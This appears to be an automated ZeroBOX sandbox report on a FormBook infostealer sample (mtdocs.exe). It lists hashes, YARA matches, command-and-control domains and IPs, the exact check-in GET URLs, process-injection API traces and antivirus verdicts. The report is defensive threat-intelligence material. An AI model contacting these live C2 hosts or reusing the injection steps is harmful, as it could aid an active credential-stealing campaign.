popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

mtdocs.exe

Formbook NSIS Malicious Library UPX PE File PE32
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 Sept. 20, 2023, 7:29 a.m. Sept. 20, 2023, 7:32 a.m.
Size 330.1KB
Type PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
MD5 847c4cd760ad16321f9ec78b672e81da
SHA256 8b57c28d168dbb2d1f1a7520c4331c657ba9970be6eba72a552b58ad3519e0e8
CRC32 EE2664BA
ssdeep 6144:vYa63g64a5n8qTnqjbZVTPeB2iAdZS+CiBttk7HtH/oLx4iBUhez:vY5g64a5ntnqHX22KiB0fG4mP
Yara
  • Malicious_Library_Zero - Malicious_Library
  • UPX_Zero - UPX packed file
  • PE_Header_Zero - PE File Signature
  • NSIS_Installer - Null Soft Installer
  • IsPE32 - (no description)

Name Response Post-Analysis Lookup
www.hbiwhwr.shop
CNAME hbiwhwr.shop
A 34.102.136.180
34.102.136.180
www.summitstracecolumbus.com
A 85.202.174.60
85.202.174.60
www.278809.com
A 154.205.107.177
154.205.107.177
www.91967.net
A 20.205.142.141
20.205.142.141
www.thwmlohr.click
A 43.154.67.170
43.154.67.170
IP Address Status Action
154.205.107.177 Active Moloch
164.124.101.2 Active Moloch
20.205.142.141 Active Moloch
34.102.136.180 Active Moloch
43.154.67.170 Active Moloch
85.202.174.60 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49167 -> 20.205.142.141:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49171 -> 43.154.67.170:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49170 -> 34.102.136.180:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49166 -> 85.202.174.60:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
section .ndata
suspicious_features GET method with no useragent header suspicious_request GET http://www.summitstracecolumbus.com/sy22/?-ZeHzZ4=nHjvsxR8MNyek9Frd1eEkzxomyZgRhw7CXfe5CvZzjzDG9G5MlwArHUwsFbqxuFMI96piyiY&Ntiptf=llvt
suspicious_features GET method with no useragent header suspicious_request GET http://www.91967.net/sy22/?-ZeHzZ4=uE9wR2Y3PY1yx307bieK+o21csjZIE3yfcLUSuw3Fyc4r02fwZ9qroRs52d1jBHfNCAz8DHk&Ntiptf=llvt
suspicious_features GET method with no useragent header suspicious_request GET http://www.hbiwhwr.shop/sy22/?-ZeHzZ4=yd0bSXVZUXdU8qKTRdtZDhtRbXCT/uJkAzwFnTNcMl5wHiXF5PZYexVTbwnTO0CSyNbsU44F&Ntiptf=llvt
suspicious_features GET method with no useragent header suspicious_request GET http://www.thwmlohr.click/sy22/?-ZeHzZ4=MgkfgN3fpomwP7fWV5mTPmG15nWdJlegbQggwbe1T0jMd3AI1ruzVKLfVQH9NXyhXYV15IAt&Ntiptf=llvt
request GET http://www.summitstracecolumbus.com/sy22/?-ZeHzZ4=nHjvsxR8MNyek9Frd1eEkzxomyZgRhw7CXfe5CvZzjzDG9G5MlwArHUwsFbqxuFMI96piyiY&Ntiptf=llvt
request GET http://www.91967.net/sy22/?-ZeHzZ4=uE9wR2Y3PY1yx307bieK+o21csjZIE3yfcLUSuw3Fyc4r02fwZ9qroRs52d1jBHfNCAz8DHk&Ntiptf=llvt
request GET http://www.hbiwhwr.shop/sy22/?-ZeHzZ4=yd0bSXVZUXdU8qKTRdtZDhtRbXCT/uJkAzwFnTNcMl5wHiXF5PZYexVTbwnTO0CSyNbsU44F&Ntiptf=llvt
request GET http://www.thwmlohr.click/sy22/?-ZeHzZ4=MgkfgN3fpomwP7fWV5mTPmG15nWdJlegbQggwbe1T0jMd3AI1ruzVKLfVQH9NXyhXYV15IAt&Ntiptf=llvt
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2640
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x732a2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2748
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x002a0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x002b0000
allocation_type: 12289 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2804
region_size: 3158016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00990000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\jkaeg.exe
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
Process injection Process 2748 called NtSetContextThread to modify thread in remote process 2804
Time & API Arguments Status Return Repeated

NtSetContextThread

 registers.eip: 1995571652
registers.esp: 1833792
registers.edi: 0
registers.eax: 4321616
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000000b4
process_identifier: 2804
1 0 0
dead_host 154.205.107.177:80
Bkav W32.AIDetectMalware
Lionic Trojan.Win32.Strab.4!c
MicroWorld-eScan Gen:Variant.Nemesis.2027
FireEye Generic.mg.847c4cd760ad1632
ALYac Gen:Variant.Fragtor.365975
Cylance unsafe
VIPRE Gen:Variant.Nemesis.2027
Sangfor Suspicious.Win32.Save.ins
CrowdStrike win/malicious_confidence_100% (W)
Arcabit Trojan.Nemesis.D7EB [many]
Cyren W32/ABRisk.BJIA-8399
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 a variant of Win32/Injector.ETHN
Cynet Malicious (score: 100)
APEX Malicious
Kaspersky UDS:DangerousObject.Multi.Generic
BitDefender Gen:Variant.Nemesis.2027
Avast Win32:TrojanX-gen [Trj]
Emsisoft Gen:Variant.Nemesis.2027 (B)
F-Secure Trojan.TR/LokiBot.nelvv
TrendMicro TROJ_GEN.R002C0DIJ23
McAfee-GW-Edition BehavesLike.Win32.RealProtect.fc
Trapmine malicious.moderate.ml.score
Sophos Mal/Generic-S
Ikarus Trojan.Win32.Injector
Webroot W32.Infostealer.Gen
Avira TR/AD.Swotter.ownut
Gridinsoft Trojan.Win32.FormBook.bot
Microsoft Trojan:Win32/Znyonm
ZoneAlarm HEUR:Trojan.Win32.Strab.gen
GData Trojan.NSISX.Spy.Gen.24
Google Detected
BitDefenderTheta Gen:NN.ZexaF.36662.muW@aq7JHehi
MAX malware (ai score=82)
VBA32 BScope.Trojan.Injector
Malwarebytes Trojan.Injector
Panda Trj/GdSda.A
Rising Trojan.Formbook!8.F858 (TFE:5:EDnZZ13kEaH)
SentinelOne Static AI - Suspicious PE
Fortinet NSIS/Injector.ETGJ!tr
AVG Win32:TrojanX-gen [Trj]
DeepInstinct MALICIOUS